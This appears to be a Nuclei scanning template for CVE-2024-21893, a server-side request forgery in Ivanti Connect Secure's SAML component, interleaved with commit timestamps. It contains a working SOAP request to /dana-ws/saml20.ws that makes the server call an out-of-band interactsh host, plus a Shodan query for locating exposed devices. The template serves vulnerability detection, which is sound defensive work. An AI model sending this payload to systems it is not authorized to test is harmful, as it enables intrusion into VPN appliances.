2024-02-03 08:20:02 +00:00
id : CVE-2024-21893
info :
name : Ivanti SAML - Server Side Request Forgery (SSRF)
author : DhiyaneshDk
severity : high
description : |
A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication.
reference :
- https://attackerkb.com/topics/FGlK1TVnB2/cve-2024-21893/rapid7-analysis
- https://www.assetnote.io/resources/research/ivantis-pulse-connect-secure-auth-bypass-round-two
- https://github.com/advisories/GHSA-5rr9-mqhj-7cr2
2024-03-23 09:28:19 +00:00
- https://github.com/Chocapikk/CVE-2024-21893-to-CVE-2024-21887
- https://github.com/Ostorlab/KEV
2024-02-03 08:20:02 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
cvss-score : 8.2
cve-id : CVE-2024-21893
cwe-id : CWE-918
2024-04-08 11:30:07 +00:00
epss-score : 0.96139
epss-percentile : 0.99473
2024-02-03 08:20:02 +00:00
cpe : cpe:2.3:a:ivanti:connect_secure:9.0:-:*:*:*:*:*:*
metadata :
2024-03-23 09:28:19 +00:00
max-request : 1
2024-02-03 08:20:02 +00:00
vendor : ivanti
2024-03-04 08:20:22 +00:00
product : "connect_secure"
2024-02-03 08:20:02 +00:00
shodan-query : "html:\"welcome.cgi?p=logo\""
tags : cve,cve2024,kev,ssrf,ivanti
http :
- raw :
- |
POST /dana-ws/saml20.ws HTTP/1.1
Host : {{Hostname}}
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://{{interactsh-url}}"/> <ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
matchers-condition : and
matchers :
- type : word
part : interactsh_protocol # Confirms the DNS Interaction
words :
- "dns"
- type : word
part : body
words :
- '/dana-na/'
- 'WriteCSS'
condition : and
2024-03-25 11:57:16 +00:00
# digest: 490a0046304402200a0547b87f667aa36af039f186372735c368c54758d1da68f5b0fd18312a8c0402201944364cc59a7b39458b86b84369d97aa826d793c83d4c42fed8f694a87920be:922c64590222798bb761d5b6d8e72950